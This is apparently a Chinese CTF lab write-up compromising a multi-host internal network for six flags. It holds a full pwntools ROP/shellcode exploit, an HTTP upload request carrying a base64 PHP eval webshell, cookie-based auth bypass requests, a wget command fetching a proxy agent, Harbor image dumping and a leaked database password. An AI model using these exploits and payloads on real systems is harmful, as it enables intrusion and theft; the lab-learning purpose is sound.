172.28.23.17(8.130.119.25)(flag1)<\/h2>\n\n\n\n
\u626b\u4e00\u4e0b\uff0c\u4f1a\u53d1\u73b08080\u7aef\u53e3\u90a3\u91cc\u6709thinkphp\u7684nday\uff0c\u53ea\u4e0d\u8fc7\u6709disable_function\uff0c\u6ca1\u6cd5\u76f4\u63a5\u6267\u884c\uff0c\u53ef\u4ee5\u76f4\u63a5\u5199\u54e5\u65af\u62c9\u7684\u9a6c\uff0c\u54e5\u65af\u62c9\u53ef\u4ee5\u81ea\u52a8\u7ed5disable_function<\/p>\n\n\n\n
\u8fdb\u5185\u7f51\u540e\u626b\u5185\u7f51<\/p>\n\n\n\n
172.28.23.33:8080 open\n172.28.23.17:8080 open\n172.28.23.26:80 open\n172.28.23.26:22 open\n172.28.23.17:80 open\n172.28.23.17:22 open\n172.28.23.33:22 open\n172.28.23.26:21 open\n[*] WebTitle: http:\/\/172.28.23.17 code:200 len:10887 title:None\n[*] WebTitle: http:\/\/172.28.23.17:8080 code:200 len:1027 title:Login Form\n[*] WebTitle: http:\/\/172.28.23.26 code:200 len:13693 title:\u65b0\u7fd4OA\u7ba1\u7406\u7cfb\u7edf-OA\u7ba1\u7406\u5e73\u53f0\u8054\u7cfb\u7535\u8bdd\uff1a13849422648\u5fae\u4fe1\u540c\u53f7\uff0cQQ958756413\n[+] ftp:\/\/172.28.23.26:21:anonymous \n [->]OASystem.zip\n[*] WebTitle: http:\/\/172.28.23.33:8080 code:302 len:0 title:None \u8df3\u8f6curl: http:\/\/172.28.23.33:8080\/login;jsessionid=743CDDF962FDC5A415B7293537AC081D\n[*] WebTitle: http:\/\/172.28.23.33:8080\/login;jsessionid=743CDDF962FDC5A415B7293537AC081D code:200 len:3860 title:\u667a\u8054\u79d1\u6280 ERP \u540e\u53f0\u767b\u9646\n[+] http:\/\/172.28.23.17:8080 poc-yaml-thinkphp5023-method-rce poc1\n[+] http:\/\/172.28.23.33:8080 poc-yaml-spring-actuator-heapdump-file \n[+] http:\/\/172.28.23.33:8080 poc-yaml-springboot-env-unauth spring2<\/code><\/pre>\n\n\n\n\u4e5f\u5c31\u662f\u5185\u7f51\u91cc\u6709\u4e24\u4e2a\u65b0\u8d44\u4ea7\uff0c172.28.23.33\u548c172.28.23.26<\/p>\n\n\n\n
172.28.23.33(172.22.10.16)(flag2)<\/h2>\n\n\n\n
\u626b\u8d44\u4ea7\u53d1\u73b0\u6709i\u6625\u79cb\u7ecf\u5178\u7684heapdump\u6cc4\u9732\uff0c\u7528JDumpSpider\u626b\u4e00\u4e0b\u53ef\u4ee5\u5f97\u5230shiro-key<\/p>\n\n\n\n
172.28.23.33:8080\/actuator\/heapdump<\/code><\/pre>\n\n\n\njava -jar JDumpSpider-1.1-SNAPSHOT-full.jar heapdump<\/code><\/pre>\n\n\n\nCookieRememberMeManager(ShiroKey)\n-------------\nalgMode = GCM, key = AZYyIgMYhG6\/CzIJlvpR2g==, algName = AES\n\n===========================================\nOriginTrackedMapPropertySource<\/code><\/pre>\n\n\n\n\u6ce8\u5165\u4e00\u4e0b\u5185\u5b58\u9a6c\uff0c\u4e0a\u53bb\u540e\u6ca1\u627e\u5230flag\uff0c\u53ea\u6709\u4e00\u4e2apwn\u9898\uff0c\u672c\u673a\u8d77\u4e86\u4e2apwn\u7684\u670d\u52a1\uff0c\u53ef\u80fd\u7528\u4e8e\u63d0\u6743<\/p>\n\n\n\n
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500\n inet 172.28.23.33 netmask 255.255.0.0 broadcast 172.28.255.255\n inet6 fe80::216:3eff:fe03:dedc prefixlen 64 scopeid 0x20<link>\n ether 00:16:3e:03:de:dc txqueuelen 1000 (Ethernet)\n RX packets 46589 bytes 65218806 (65.2 MB)\n RX errors 0 dropped 0 overruns 0 frame 0\n TX packets 9861 bytes 2483408 (2.4 MB)\n TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0\n\neth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500\n inet 172.22.10.16 netmask 255.255.255.0 broadcast 172.22.10.255\n inet6 fe80::216:3eff:fe04:3f50 prefixlen 64 scopeid 0x20<link>\n ether 00:16:3e:04:3f:50 txqueuelen 1000 (Ethernet)\n RX packets 159 bytes 6678 (6.6 KB)\n RX errors 0 dropped 0 overruns 0 frame 0\n TX packets 172 bytes 7684 (7.6 KB)\n TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0\n\nlo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536\n inet 127.0.0.1 netmask 255.0.0.0\n inet6 ::1 prefixlen 128 scopeid 0x10<host>\n loop txqueuelen 1000 (Local Loopback)\n RX packets 568 bytes 53568 (53.5 KB)\n RX errors 0 dropped 0 overruns 0 frame 0\n TX packets 568 bytes 53568 (53.5 KB)\n TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0<\/code><\/pre>\n\n\n\n\u4e0d\u4f1apwn\uff0c\u7528\u5927\u5934\u54e5\u7684\u811a\u672c\uff0c\u4ed6\u7684\u811a\u672c\u6211\u76f4\u63a5\u8dd1\u603b\u662f\u62a5\u9519\uff0c\u81ea\u5df1\u6539\u4e86\u6539\u6570\u636e\u7c7b\u578b\u8dd1\u901a\u4e86<\/p>\n\n\n\n
from pwn import *\n\nelf = ELF('.\/HashNote')\ncontext(arch=elf.arch, os='linux', log_level='debug')\n# p = process('.\/HashNote')\n\np = remote('172.28.23.33', 59696)\n\ndef send_command(command):\n p.sendlineafter(b': ', str(command))\n\ndef add_entry(key, value):\n send_command(1)\n p.sendlineafter(b'Key: ', key)\n p.sendlineafter(b'Data: ', value)\n\ndef get_entry(key):\n send_command(2)\n p.sendlineafter(b'Key: ', key)\n\ndef update_entry(key, value):\n send_command(3)\n p.sendlineafter(b'Key: ', key)\n p.sendlineafter(b'Data: ', value)\n\ndef set_username(value):\n send_command(4)\n p.sendafter(b'New username: ', value)\n\n# Authenticate\np.sendlineafter(b'Username: ', b'123')\np.sendlineafter(b'Password: ', b'freep@ssw0rd:3')\n\n# Add entries to setup the environment\nadd_entry(b'aabP', b'aaaaaaaa')\nadd_entry(b'aace', b'C' * 0xc0)\n\n# Shellcode to spawn a shell\nsc = [\n b'\\x6a\\x3b', # push 0x3b\n b'\\x58', # pop rax\n b'\\x99', # cdq\n b'\\x48\\xbb\\x2f\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68', # movabs rbx, 0x68732f6e69622f2f\n b'\\x53', # push rbx\n b'\\x48\\x89\\xe7', # mov rdi, rsp\n b'\\x52', # push rdx\n b'\\x57', # push rdi\n b'\\x48\\x89\\xe6', # mov rsi, rsp\n b'\\x0f\\x05' # syscall\n]\nshellcode = b''.join(sc)\nusername_addr = 0x5dc980\nfake_obj_addr = username_addr + 0x10\n\ndef arbitrary_read(addr):\n payload = p64(fake_obj_addr)\n payload += p64(0xdeadbeef)\n\n fake_obj = p64(fake_obj_addr + 0x10) + p64(4)\n fake_obj += b'aahO'.ljust(0x10, b'\\x00')\n fake_obj += p64(addr) + p64(8) + b'aaaaaaaa'\n\n payload += fake_obj\n payload += shellcode\n payload = payload.ljust(128, b'\\x00')\n set_username(payload)\n get_entry(b'aahO')\n\ndef arbitrary_write(addr, data):\n payload = p64(fake_obj_addr)\n payload += p64(0xdeadbeef)\n\n fake_obj = p64(fake_obj_addr + 0x10) + p64(4)\n fake_obj += b'aahO'.ljust(0x10, b'\\x00')\n fake_obj += p64(addr) + p64(len(data)) + b'aaaaaaaa'\n\n payload += fake_obj\n payload += shellcode\n payload = payload.ljust(128, b'\\x00')\n set_username(payload)\n update_entry(b'aahO', data)\n\n# Leak the stack address\nenviron = 0x5e4c38 \narbitrary_read(environ)\nstack_addr = u64((p.recvuntil(b'\\x7f', drop=False)[-6:].ljust(8, b'\\0')))\nsuccess('stack_addr', stack_addr)\n\n# ROP gadgets\nrdi = 0x0000000000405e7c\nrsi = 0x000000000040974f\nrax = 0x00000000004206ba\nrdx_rbx = 0x000000000053514b\nshr_eax_2 = 0x0000000000523f2e\nsyscall_ret = 0x00000000004d9776\n\n# ROP payload to map memory and jump to shellcode\npayload = p64(rdi) + p64(username_addr & ~0xfff) + p64(rsi) + p64(0x1000) + p64(rdx_rbx) + p64(7) + p64(0) + p64(rax) + p64(0xa << 2) + p64(shr_eax_2) + p64(syscall_ret) + p64(username_addr + 0x48)\n\narbitrary_write(stack_addr - 0x210, payload)\np.sendline(b'uname -ar')\n\np.interactive()\n<\/code><\/pre>\n\n\n\n172.22.10.28:22 open\n172.22.10.16:8080 open\n172.22.10.28:3306 open\n172.22.10.28:80 open\n172.22.10.16:22 open\n[*] WebTitle http:\/\/172.22.10.16:8080 code:302 len:0 title:None \u8df3\u8f6curl: http:\/\/172.22.10.16:8080\/login;jsessionid=CF37645FAC7BD2F765DFF7D2C08DBF7E\n[*] WebTitle http:\/\/172.22.10.16:8080\/login;jsessionid=CF37645FAC7BD2F765DFF7D2C08DBF7E code:200 len:3860 title:\u667a\u8054\u79d1\u6280 ERP \u540e\u53f0\u767b\u9646\n[*] WebTitle http:\/\/172.22.10.28 code:200 len:1975 title:DooTask\n[+] PocScan http:\/\/172.22.10.16:8080 poc-yaml-spring-actuator-heapdump-file \n[+] PocScan http:\/\/172.22.10.16:8080 poc-yaml-springboot-env-unauth spring2<\/code><\/pre>\n\n\n\n\u63d0\u6743\u540e\u80fd\u62ff\u5230\u672c\u673a\u7684flag<\/p>\n\n\n\n
cat \/root\/flag_RaYz1\/f* <\/code><\/pre>\n\n\n\n![\"\"\/](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/figure>\n\n\n\n172.28.23.26(172.22.14.6)(flag3)<\/h2>\n\n\n\n
26\u6709\u4e00\u4e2a\u533f\u540d\u767b\u5f55\uff0c\u80fd\u62ff\u5230\u6e90\u7801\uff0c\u6050\u6015\u662f\u8981\u5ba10day\uff0c\u62bd\u8c61<\/p>\n\n\n\n
\u6e90\u7801\u9274\u6743\u6709\u95ee\u9898\uff0c\u53ea\u8981\u53c2\u6570\u503c\u4e0d\u4e3a\u7a7a\u4e14\u5b58\u5728\u5373\u53ef\u7ed5\u8fc7\uff0c\u6240\u4ee5\u53ef\u4ee5\u76f4\u63a5Cookie: id=1; loginname=1; jueseid=1; danweiid=1; quanxian=1\u8fdb\u540e\u53f0<\/p>\n\n\n\n
GET \/main.php HTTP\/1.1\nHost: 172.28.23.26\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko\/20100101 Firefox\/126.0\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate, br\nConnection: close\nCookie: id=1; loginname=1; jueseid=1; danweiid=1; quanxian=1;\nUpgrade-Insecure-Requests: 1\nPriority: u=1<\/code><\/pre>\n\n\n\n\u8fd9\u4e2a\u6d1e\u4e5f\u5c31\u56fe\u4e00\u4e50\uff0c\u5173\u952e\u5728\u4e8e\u90a3\u4e2auploadbase64.php\uff0c\u4ed6\u8fd9\u91cc\u7684\u9274\u6743\u903b\u8f91\u4e5f\u6709\u95ee\u9898\uff0c\u53ea\u8981\u6c42data:image\/\u6587\u4ef6\u683c\u5f0f;base64\u52a0\u7f16\u7801\u540e\u7684\u6570\u636e\uff0c\u6240\u4ee5\u6211\u4eec\u4f20\u4e00\u4e2adata:image\/php;base64,\u5c31\u80fd\u76f4\u63a5\u4e0a\u4f20php\u6587\u4ef6\u4e86\uff0c\u76f4\u63a5\u72e0\u72e0\u62ff\u4e0b<\/p>\n\n\n\n
POST \/uploadbase64.php HTTP\/1.1\nHost: 172.28.23.26\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko\/20100101 Firefox\/126.0\nCookie: id=1; loginname=1; jueseid=1; danweiid=1; quanxian=1;\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate, br\nContent-Length: 69\nConnection: close\nUpgrade-Insecure-Requests::1\nContent-Type:application\/x-www-form-urlencoded\n\nimgbase64=data:image\/php;base64, PD9waHAgQGV2YWwoJF9HRVRbMV0pOyA\/Pg==<\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\n\tpcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,ld,file_get_contents,readfile,debug_backtrace,debug_print_backtrace,gc_collect_cycles,array_merge_recursive,highlight_file,show_source,iconv,dl<\/code><\/pre>\n\n\n\n\u53ef\u4ee5\u770b\u5230\u6ca1ban putenv\uff0c\u80fd\u7528LD_proload\u7ed5disable_function(\u51b0\u874e\u548c\u54e5\u65af\u62c9\u6211\u90fd\u6ca1\u8fde\u4e0a\u53bb)\uff0c\u7528\u8681\u5251\u63d2\u4ef6\u7ed5<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n\u8fd9\u91cc\u9700\u8981\u7528get\u7684\u4e00\u53e5\u8bdd\u6728\u9a6c\uff0cpost\u7684\u4f1a\u5f88\u7384\u5b66\u7684\u6ca1\u6cd5\u6267\u884c<\/p>\n\n\n\n
<\/figure><\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n\u8fd9\u91cc\u6539\u62101.php<\/p>\n\n\n\n
<\/figure><\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n\u7136\u540e\u8bbf\u95ee.antproxy.php\u5373\u53ef\u6b63\u5e38\u6267\u884c\u547d\u4ee4\uff0c\u53ef\u4ee5\u770b\u5230base32\u6709suid\u6743\u9650\uff0c\u53ef\u7528\u4e8e\u63d0\u6743<\/p>\n\n\n\n
http://172.28.23.26\/upload\/.antproxy.php?1=system(%22find%20\/%20-perm%20-u=s%20-type%20f%202%3E\/dev\/null%22);<\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\nhttp:\/\/172.28.23.26\/upload\/.antproxy.php?1=system(\"base32 \/flag02.txt\");<\/code><\/pre>\n\n\n\n<\/figure><\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n\u53ef\u4ee5\u770b\u5230\u4ed6\u4e5f\u662f\u53cc\u7f51\u5361\uff0c\u901a\u5411172.22.14.6<\/p>\n\n\n\n
eth0 Link encap:Ethernet HWaddr 00:16:3e:01:ed:cb \n inet addr:172.28.23.26 Bcast:172.28.255.255 Mask:255.255.0.0\n inet6 addr: fe80::216:3eff:fe01:edcb\/64 Scope:Link\n UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1\n RX packets:117750 errors:0 dropped:0 overruns:0 frame:0\n TX packets:18982 errors:0 dropped:0 overruns:0 carrier:0\n collisions:0 txqueuelen:1000 \n RX bytes:166663988 (166.6 MB) TX bytes:3664043 (3.6 MB)\n\neth1 Link encap:Ethernet HWaddr 00:16:3e:03:4b:b5 \n inet addr:172.22.14.6 Bcast:172.22.255.255 Mask:255.255.0.0\n inet6 addr: fe80::216:3eff:fe03:4bb5\/64 Scope:Link\n UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1\n RX packets:773 errors:0 dropped:0 overruns:0 frame:0\n TX packets:778 errors:0 dropped:0 overruns:0 carrier:0\n collisions:0 txqueuelen:1000 \n RX bytes:33562 (33.5 KB) TX bytes:33608 (33.6 KB)\n\nlo Link encap:Local Loopback \n inet addr:127.0.0.1 Mask:255.0.0.0\n inet6 addr: ::1\/128 Scope:Host\n UP LOOPBACK RUNNING MTU:65536 Metric:1\n RX packets:383 errors:0 dropped:0 overruns:0 frame:0\n TX packets:383 errors:0 dropped:0 overruns:0 carrier:0\n collisions:0 txqueuelen:1 \n RX bytes:141365 (141.3 KB) TX bytes:141365 (141.3 KB)\n<\/code><\/pre>\n\n\n\n\u7136\u540e\u5efa\u7acb\u5185\u7f51\u591a\u91cd\u4ee3\u7406\uff0c\u56e0\u4e3a\u6211\u4eec\u73b0\u5728\u53ea\u80fd\u5728\u7f51\u9875\u7aef\u7528get\u4f20\u547d\u4ee4\uff0c\u6267\u884c\u8d77\u6765\u975e\u5e38\u9ebb\u70e6\uff0c\u6240\u4ee5\u6211\u4eec\u9996\u5148\u628aStowaway\u7684linux_x64_admin\u653e\u5728\u6700\u5f00\u59cb\u7684172.28.23.17(\u4e5f\u5c31\u662f\u9898\u76ee\u76f4\u63a5\u7ed9\u7684\u90a3\u4e2aip)\u7684\u7f51\u7ad9\u76ee\u5f55\u4e0b\uff0c\u7136\u540ewget\u8fc7\u6765<\/p>\n\n\n\n
http://172.28.23.26\/upload\/.antproxy.php?1=system(%22wget%20http:\/\/172.28.23.17:8080\/linux_x64_agent%22);<\/code><\/pre>\n\n\n\n\u63a5\u7740\u7528\u6211\u8fc7\u53bb\u6587\u7ae0\u91cc\u63d0\u5230\u8fc7\u7684\u591a\u91cd\u4ee3\u7406\u5efa\u7acb\u65b9\u5f0f\uff0c\u5728\u8282\u70b91\u542f\u52a8\u76d1\u542c<\/p>\n\n\n\n
(admin) >> use 0\n(node 0) >> listen\n[*] BE AWARE! If you choose IPTables Reuse or SOReuse,you MUST CONFIRM that the node you're controlling was started in the corresponding way!\n[*] When you choose IPTables Reuse or SOReuse, the node will use the initial config(when node started) to reuse port!\n[*] Please choose the mode(1.Normal passive\/2.IPTables Reuse\/3.SOReuse): 1\n[*] Please input the [ip:]<port> : 1234\n[*] Waiting for response......\n[*] Node is listening on 1234\n(node 0) >> \n[*] New node come! Node id is 1<\/code><\/pre>\n\n\n\n\u63a5\u7740\u5728\u7f51\u9875\u7aef\u8fde\u4e0a\u8282\u70b9\u4e00<\/p>\n\n\n\n
http:\/\/172.28.23.26\/upload\/.antproxy.php?1=system(\".\/linux_x64_agent -c 172.28.23.17:1234 -s 123 --reconnect 8\");<\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\n\u7136\u540e\u5176\u5b9eStowaway\u5176\u5b9e\u662f\u6709shell\u529f\u80fd\u7684\uff0c\u53ea\u662f\u6211\u4e4b\u524d\u4e00\u76f4\u6ca1\u7528\u8fc7\uff0cuse 2\u7136\u540eshell\u5373\u53ef\uff0c\u5f53\u7136\u8fd9\u4e5f\u6ca1\u5565\u7528\u4e3b\u8981\u8fd8\u662f\u8d77\u4e2a\u6df1\u5c42\u5185\u7f51\u7684\u4ee3\u7406<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\neth0 Link encap:Ethernet HWaddr 00:16:3e:01:ed:cb \n inet addr:172.28.23.26 Bcast:172.28.255.255 Mask:255.255.0.0\n inet6 addr: fe80::216:3eff:fe01:edcb\/64 Scope:Link\n UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1\n RX packets:125788 errors:0 dropped:0 overruns:0 frame:0\n TX packets:22857 errors:0 dropped:0 overruns:0 carrier:0\n collisions:0 txqueuelen:1000 \n RX bytes:171870762 (171.8 MB) TX bytes:8107676 (8.1 MB)\n\neth1 Link encap:Ethernet HWaddr 00:16:3e:03:4b:b5 \n inet addr:172.22.14.6 Bcast:172.22.255.255 Mask:255.255.0.0\n inet6 addr: fe80::216:3eff:fe03:4bb5\/64 Scope:Link\n UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1\n RX packets:1166 errors:0 dropped:0 overruns:0 frame:0\n TX packets:1171 errors:0 dropped:0 overruns:0 carrier:0\n collisions:0 txqueuelen:1000 \n RX bytes:50068 (50.0 KB) TX bytes:50114 (50.1 KB)\n\nlo Link encap:Local Loopback \n inet addr:127.0.0.1 Mask:255.0.0.0\n inet6 addr: ::1\/128 Scope:Host\n UP LOOPBACK RUNNING MTU:65536 Metric:1\n RX packets:798 errors:0 dropped:0 overruns:0 frame:0\n TX packets:798 errors:0 dropped:0 overruns:0 carrier:0\n collisions:0 txqueuelen:1 \n RX bytes:184900 (184.9 KB) TX bytes:184900 (184.9 KB)<\/code><\/pre>\n\n\n\n\u626b\u4e00\u4e0b172.22.14.6\u8fd9\u5f20\u7f51\u5361<\/p>\n\n\n\n
(icmp) Target 172.22.14.6 is alive\n(icmp) Target 172.22.14.37 is alive\n(icmp) Target 172.22.14.46 is alive\n[*] Icmp alive hosts len is: 3\n172.22.14.6:80 open\n172.22.14.46:80 open\n172.22.14.46:22 open\n172.22.14.37:22 open\n172.22.14.6:22 open\n172.22.14.6:21 open\n172.22.14.37:2379 open\n172.22.14.37:10250 open\n[*] alive ports len is: 8\nstart vulscan\n[*] WebTitle http:\/\/172.22.14.46 code:200 len:785 title:Harbor\n[*] WebTitle http:\/\/172.22.14.6 code:200 len:13693 title:\u65b0\u7fd4OA\u7ba1\u7406\u7cfb\u7edf-OA\u7ba1\u7406\u5e73\u53f0\u8054\u7cfb\u7535\u8bdd\uff1a13849422648\u5fae\u4fe1\u540c\u53f7\uff0cQQ958756413\n[+] InfoScan http:\/\/172.22.14.46 [Harbor] \n[*] WebTitle https:\/\/172.22.14.37:10250 code:404 len:19 title:None\n[+] ftp 172.22.14.6:21:anonymous \n [->]OASystem.zip\n[+] PocScan http:\/\/172.22.14.46\/swagger.json poc-yaml-swagger-ui-unauth [{path swagger.json}]\n\u5df2\u5b8c\u6210 5\/8 [-] ssh 172.22.14.6:22 root 12345678 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain \n\u5df2\u5b8c\u6210 5\/8 [-] ssh 172.22.14.37:22 root 1qaz!QAZ ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain \n<\/code><\/pre>\n\n\n\n172.22.14.46(flag4)<\/h2>\n\n\n\n
https:\/\/github.com\/404tk\/CVE-2022-46463<\/a><\/p>\n\n\n\n\u2514\u2500$ proxychains python3 harbor.py http:\/\/172.22.14.46\/\n[+] project\/projectadmin\n[+] project\/portal\n[+] library\/nginx\n[+] library\/redis\n[+] harbor\/secret\n<\/code><\/pre>\n\n\n\n\u4e0b\u8f7dsecret\u955c\u50cf\uff0c\u6162\u6162\u7ffb\u5c31\u627e\u5230\u4e86<\/p>\n\n\n\n
proxychains python3 harbor.py http:\/\/172.22.14.46\/ --dump harbor\/secret --v2\n<\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\n172.22.10.28(flag5)<\/h2>\n\n\n\n
\u4e0b\u8f7dprojectadmin\u955c\u50cf<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\nproxychains python3 harbor.py http:\/\/172.22.14.46\/ --dump project\/projectadmin --v2<\/code><\/pre>\n\n\n\nspring.datasource.url=jdbc:mysql:\/\/172.22.10.28:3306\/projectadmin?characterEncoding=utf-8&useUnicode=true&serverTimezone=UTC\nspring.datasource.username=root\nspring.datasource.password=My3q1i4oZkJm3\nspring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver<\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\n\u7528\u5185\u7f6e\u7684udf\u63d0\u4e00\u4e0b\u6743\u5c31\u884c\u4e86(MDUT\u6709\u70b9\u7384\u5b66\uff0c\u4ed6\u90a3\u4e2asocks\u529f\u80fd\u6211\u7528\u4e86\u8fde\u4e0d\u4e0a\uff0c\u6362\u6210proxifier\u7684\u5168\u5c40\u4ee3\u7406\u624d\u8fde\u4e0a\u53bb)<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n172.22.14.37(flag6)<\/h2>\n\n\n\n
\u8fd9\u4e2aflag6\u662f\u6700\u96be\u7ef7\u7684<\/p>\n\n\n\n
\u9996\u51486443\u5b58\u5728k8s Api Server\u672a\u6388\u6743\uff0c\u7167\u7740\u6253\u5373\u53ef\u6d45\u6790K8S\u5404\u79cd\u672a\u6388\u6743\u653b\u51fb\u65b9\u6cd5<\/a><\/p>\n\n\n\n
![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F05%2F28-1.png\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F05%2F28-2.png\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F05%2F28-3.png\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F05%2F28-4.png\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F05%2F28-5.png\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F05%2F28-6.png\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F05%2F28-7.png\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F05%2F28-8.png\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F05%2F28-9.png\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024\/05\/28-10.png\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F05%2F28-16.png\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F05%2F28-15.png\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F05%2F28-17.png\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F05%2F28-18.png\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F05%2F28-19.png\")
<\/div><\/figure>\n\n\n\n![\"\"\/](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2024%2F05%2F28-20.png\")
<\/div><\/figure>\n\n\n\n